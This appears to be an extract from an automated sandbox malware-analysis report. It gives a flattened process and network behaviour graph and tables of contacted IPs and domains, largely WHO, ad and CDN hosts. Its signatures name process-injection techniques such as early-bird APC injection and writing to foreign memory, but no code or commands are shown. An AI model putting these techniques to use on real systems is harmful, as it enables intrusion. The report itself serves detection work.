168.62.194.64 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 31->80 file8 signatures9 process10 dnsIp11 94 Early bird code injection technique detected 36->94 96 Writes to foreign memory regions 36->96 98 Allocates memory in foreign processes 36->98 100 Queues an APC in another process (thread injection) 36->100 50 mobsync.exe 36->50         started        52 conhost.exe 36->52         started        72 www.who.int 39->72 54 iexplore.exe 39->54         started        74 168.61.161.212 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 44->74 76 192.168.2.1 unknown unknown 46->76 signatures12 process13 dnsIp14 57 WerFault.exe 50->57         started        66 fontawesome-cdn.fonticons.netdna-cdn.com 23.111.9.35, 443, 49708, 49709 HIGHWINDS2US United States 54->66 68 108.177.15.154 GOOGLEUS United States 54->68 70 23 other IPs or domains 54->70 process15 dnsIp16 78 13.88.21.125 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 57->78
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
108.177.15.154
unknown United States
15169 GOOGLEUS false
23.111.9.35
fontawesome-cdn.fonticons.netdna-cdn.com United States
33438 HIGHWINDS2US false
172.217.168.68
unknown United States
15169 GOOGLEUS false
13.88.21.125
unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
172.217.168.3
unknown United States
15169 GOOGLEUS false
172.217.168.1
unknown United States
15169 GOOGLEUS false
172.217.168.2
googleads.g.doubleclick.net United States
15169 GOOGLEUS false
168.61.161.212
unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
65.9.58.114
unknown United States
16509 AMAZON-02US false
172.217.168.54
unknown United States
15169 GOOGLEUS false
199.232.136.157
platform.twitter.map.fastly.net United States
54113 FASTLYUS false
168.62.194.64
unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
googleads.g.doubleclick.net 172.217.168.2 true
fontawesome-cdn.fonticons.netdna-cdn.com 23.111.9.35 true
platform.twitter.map.fastly.net 199.232.136.157 true
www.who.int unknown unknown
m.addthis.com unknown unknown
v1.addthisedge.com unknown unknown
www.clarity.ms unknown unknown
s7.addthis.com unknown unknown
z.moatads.com unknown unknown
static.doubleclick.net unknown unknown
use.fontawesome.com unknown unknown
cdn.who.int unknown unknown
platform.twitter.com unknown unknown
www.youtube.com unknown unknown
c.clarity.ms unknown unknown